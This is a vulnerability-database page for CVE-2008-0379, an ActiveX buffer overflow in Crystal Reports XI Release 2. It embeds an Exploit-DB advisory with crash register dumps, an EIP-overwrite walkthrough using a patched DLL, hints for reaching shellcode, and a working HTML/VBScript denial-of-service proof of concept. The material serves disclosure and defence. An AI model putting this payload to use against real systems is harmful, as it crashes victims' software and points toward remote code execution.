CVE-2008-0379 : Detail

CVE-2008-0379

Overflow
14%V4
Network
2008-01-22
18h00 +00:00
2017-09-28
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Race condition in the Enterprise Tree ActiveX control (EnterpriseControls.dll 11.5.0.313) in Crystal Reports XI Release 2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the SelectedSession method, which triggers a buffer overflow.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 4931

Publication date : 2008-01-16 23h00 +00:00
Author : shinnai
EDB Verified : Yes

##################################################################################### Application: Crystal Reports XI Release 2 (Enterprise Tree Control) Remote BoF/Dos www.businessobjects.com Versions: 11 Platforms: Windows XP Professional Bug: buffer-overflow Exploitation: remote Date: 2007-01-16 Author: shinnai e-mail: shinnai[at]autistici[dot]org web: http://shinnai.altervista.org ##################################################################################### 1) Introduction 2) Technical details and bug 3) The Code 4) Fix ##################################################################################### =============== 1) Introduction =============== This component is used to visualize on the web reports created with Crystal Reports ##################################################################################### ============================ 2) Technical details and bug ============================ Name: EnterpriseControls.dll Ver.: 11.5.0.313 CLSID: {3D58C9F3-7CA5-4C44-9D62-C5B63E059050} MD5: 179e2dc7f9f6e9d6e0210e89c623fd72 Marked as: RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data The problem is a buffer-overflow which occours when you use the "SelectedSession()" method. It seems that, during the initialization of the component, a race condition occours between threads and 4 bytes of the same component will overwrite EIP. If you patch these 4 bytes, you can control this register, using it to jump to a shellcode and execute arbitrary code on user's pc. For exploiting this vulnerability you only need to create a web page containing the CLSID and the codebase path to your crafted ActiveX. These are registers using the original file: 14:59:34.126 pid=1468 tid=1250 EXCEPTION (first-chance) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9 EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01 EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- 14:59:34.142 pid=1468 tid=1250 EXCEPTION (unhandled) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [FF7DE928]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 28 E9 7D FF-FF FF 83 6C 24 04 2C E9 EBX=036B68CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3A8: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 68 F4 FC 01 EBP=01FCF3D4: 5C F4 FC 01 77 01 45 5A-68 F4 FC 01 54 F7 07 03 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=036B68F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=FF7DE928: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- We'll find these 4 bytes at this address: 0x000172D8 "28 E9 7D FF"... using an hex editor to modify to: 0x000172D8 "42 42 42 42"... we'll have: C:\Tools>bindiff /c /d EnterpriseControls_patched.dll EnterpriseControls_ori.dll Different, Left is newer 4 bytes differ ================================================================================ 000172D0 87 FF FF FF 83 6C 24 04 .....l$. 87 FF FF FF 83 6C 24 04 .....l$. 000172D8 <42 42 42 42>FF FF 83 6C BBBB...l <28 E9 7D FF>FF FF 83 6C (.}....l 000172E0 24 04 2C E9 $.,. 24 04 2C E9 $.,. ================================================================================ File Count Summary Identical: 0 files Near Identical: 0 files Different: 1 files Left Only: 0 files Right Only: 0 files Errors: 0 files Total: 1 files Byte Count Summary Matched: 4 bytes differ Left Only: 0 bytes Right Only: 0 bytes Total: 4 bytes and registers values will be: 15:05:38.947 pid=12D4 tid=1240 EXCEPTION (first-chance) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [42424242]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9 EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01 EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- 15:05:38.978 pid=12D4 tid=1240 EXCEPTION (unhandled) ---------------------------------------------------------------- Exception C0000005 (ACCESS_VIOLATION reading [42424242]) ---------------------------------------------------------------- EAX=5A4472D4: 83 6C 24 04 42 42 42 42-FF FF 83 6C 24 04 2C E9 EBX=037368CC: 44 C7 4D 5A 28 C7 4D 5A-00 C7 4D 5A D4 C6 4D 5A ECX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A EDX=5A4DC55C: D4 72 44 5A 65 6C 44 5A-6F 6C 44 5A E4 6F 44 5A ESP=01FCF3CC: B4 3B 43 5A 5C C5 4D 5A-C8 F7 44 5A 8C F4 FC 01 EBP=01FCF3F8: 80 F4 FC 01 77 01 45 5A-8C F4 FC 01 CC 99 9D 02 ESI=5A4DE140: 79 3A 5C 66 72 61 6D 65-77 6F 72 6B 5F 73 64 6B EDI=037368F4: 5C C5 4D 5A 44 C5 4D 5A-01 00 00 00 30 C5 4D 5A EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? --> N/A ---------------------------------------------------------------- isn't it fun? Naturally, EIP overwrite requires that someone uses the crafted dll otherwise you can just enjoy a crash of tha application. ##################################################################################### =========== 3) The Code =========== I will release a public exploit but, this time, no code execution ;-) Everything I could say is that you can directly inject your shellcode into the dll or pass an argument to "SelectedSession()" method and then jump to the shellcode. Poc: Click here for DoS exploit <html> <object classid='clsid:3D58C9F3-7CA5-4C44-9D62-C5B63E059050' id='test'></object> <script language = 'vbscript'> test.SelectedSession = "" </script> </html> ##################################################################################### ====== 4) Fix ====== No fix ##################################################################################### # milw0rm.com [2008-01-17]

Products Mentioned

Configuraton 0

Businessobjects>>Crystal_reports_xi >> Version r2

References

https://www.exploit-db.com/exploits/4931
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/27333
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1019239
Tags : vdb-entry, x_refsource_SECTRACK
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.